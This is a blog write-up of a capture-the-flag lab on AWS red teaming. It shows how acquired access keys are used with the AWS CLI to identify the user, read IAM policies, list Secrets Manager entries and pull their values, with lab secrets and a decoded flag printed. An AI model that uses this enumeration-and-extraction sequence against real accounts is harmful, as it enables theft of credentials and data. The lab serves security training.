DEV Community

David Disu
David Disu

Posted on

cybr.com [LAB] Introduction to Secrets Manager Enumeration (AWS Red Teaming)

During a cloud security assessment, enumeration is a critical phase. It allows you to understand your current permissions, map out the available attack surface, and identify potential misconfigurations or exposed sensitive data. This writeup walks through a hands-on lab demonstrating how to perform credential enumeration, list secrets, and extract sensitive payloads using the AWS CLI.


Part 1: Initial Identity Enumeration

Every cloud security assessment begins with determining who you are in the environment. Using an acquired set of AWS access keys, the first step is to call the Security Token Service (STS) to get the current identity context.

aws sts get-caller-identity
Enter fullscreen mode Exit fullscreen mode

The command returns the following JSON structure:

{  
   "UserId": "AIDAQGYBPW3JHDS5K4A75",  
   "Account": "014498641618",  
   "Arn": "arn:aws:iam::014498641618:user/Julie"  
}
Enter fullscreen mode Exit fullscreen mode

The output confirms that the credentials belong to an IAM user named Julie within account 014498641618.

Part 2: Privilege and Policy Assessment

Knowing the identity is Julie, the next objective is to find out what Julie is authorized to do. We query IAM to list the inline policies attached directly to this user account.

aws iam list-user-policies --user-name julie
Enter fullscreen mode Exit fullscreen mode
{  
   "PolicyNames": [  
       "AllowReadSecretsManager"  
   ]  
}
Enter fullscreen mode Exit fullscreen mode

An inline policy named AllowReadSecretsManager exists. To view the exact permissions granted by this policy, we pull the specific policy document.

aws iam get-user-policy --user-name julie --policy-name AllowReadSecretsManager
Enter fullscreen mode Exit fullscreen mode

The policy details reveal three distinct permission blocks:

{
   "UserName": "julie",  
   "PolicyName": "AllowReadSecretsManager",  
   "PolicyDocument": {  
       "Version": "2012-10-17",  
       "Statement": [  
           {  
               "Action": [  
                   "iam:ListPolicies",  
                   "iam:ListPolicyVersions",  
                   "iam:GetPolicy",  
                   "iam:GetUser",  
                   "iam:GetUserPolicy",  
                   "iam:ListUserPolicies"  
               ],  
               "Effect": "Allow",  
               "Resource": "*",  
               "Sid": "AllowIAMActions"  
           },  
           {  
               "Action": [  
                   "secretsmanager:GetSecretValue",  
                   "secretsmanager:ListSecretVersionIds",  
                   "secretsmanager:GetResourcePolicy",  
                   "secretsmanager:DescribeSecret"  
               ],  
               "Effect": "Allow",  
               "Resource": [  
                   "arn:aws:secretsmanager:us-east-1:014498641618:secret:sm-enumerate-password*",  
                   "arn:aws:secretsmanager:us-east-1:014498641618:secret:sm-enumerate-api-key*"  
               ],  
               "Sid": "AllowSecretsManagerActions"  
           },  
           {  
               "Action": [  
                   "secretsmanager:ListSecrets"  
               ],  
               "Effect": "Allow",  
               "Resource": "*",  
               "Sid": "AllowListSecrets"  
           }  
       ]  
   }  
}
Enter fullscreen mode Exit fullscreen mode

Policy Analysis

AllowIAMActions: Allows the user to perform read-only enumeration on IAM profiles and policies.

AllowListSecrets: Grants the ability to list all available metadata for secrets in this account across any resource path.

AllowSecretsManagerActions: Restricts the actual extraction of secret values exclusively to two target prefixes: sm-enumerate-password* and sm-enumerate-api-key*.
Enter fullscreen mode Exit fullscreen mode

Part 3: Enumerating Secrets Manager

With verification that secretsmanager:ListSecrets is permitted globally, we execute a command to discover what secrets exist in the region.

aws secretsmanager list-secrets
Enter fullscreen mode Exit fullscreen mode

The output highlights two secrets matching the resource restrictions found in the IAM policy:

Secret Name: sm-enumerate-password

    ARN: arn:aws:secretsmanager:us-east-1:014498641618:secret:sm-enumerate-password-cSojGz

Secret Name: sm-enumerate-api-key

    ARN: arn:aws:secretsmanager:us-east-1:014498641618:secret:sm-enumerate-api-key-zShLNz
Enter fullscreen mode Exit fullscreen mode

Part 4: Extracting and Decoding the Flag

Since the policy explicitly permits secretsmanager:GetSecretValue for these specific names, we can query the values directly.
Extracting the Password

aws secretsmanager get-secret-value --secret-id sm-enumerate-password 
Enter fullscreen mode Exit fullscreen mode
{  
   "ARN": "arn:aws:secretsmanager:us-east-1:014498641618:secret:sm-enumerate-password-cSojGz",  
   "Name": "sm-enumerate-password",  
   "SecretString": "{\"password\":\"cybr-labs-are-super-fun-2211\"}"
}
Enter fullscreen mode Exit fullscreen mode

Extracting the API Key

aws secretsmanager get-secret-value --secret-id sm-enumerate-api-key
Enter fullscreen mode Exit fullscreen mode
{  
   "ARN": "arn:aws:secretsmanager:us-east-1:014498641618:secret:sm-enumerate-api-key-zShLNz",  
   "Name": "sm-enumerate-api-key",  
   "SecretString": "{\"secret-api-key\":\"Y3lici1sYWJzLWZha2UtYXBpLWtleS0xMTIy\"}"
}
Enter fullscreen mode Exit fullscreen mode

The SecretString for the API key contains a Base64-encoded string: Y3lici1sYWJzLWZha2UtYXBpLWtleS0xMTIy.

Decoding the Flag

To complete the Capture the Flag challenge, the Base64 value must be passed to a decoder. Running this locally via Linux utility tools:

echo "Y3lici1sYWJzLWZha2UtYXBpLWtleS0xMTIy" | base64 -d
Enter fullscreen mode Exit fullscreen mode

Decoded Capture the Flag Value:
cybr-labs-fake-api-key-1122

PWNSOME REFERENCES:

https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/#cli-aws-secretsmanager

Top comments (0)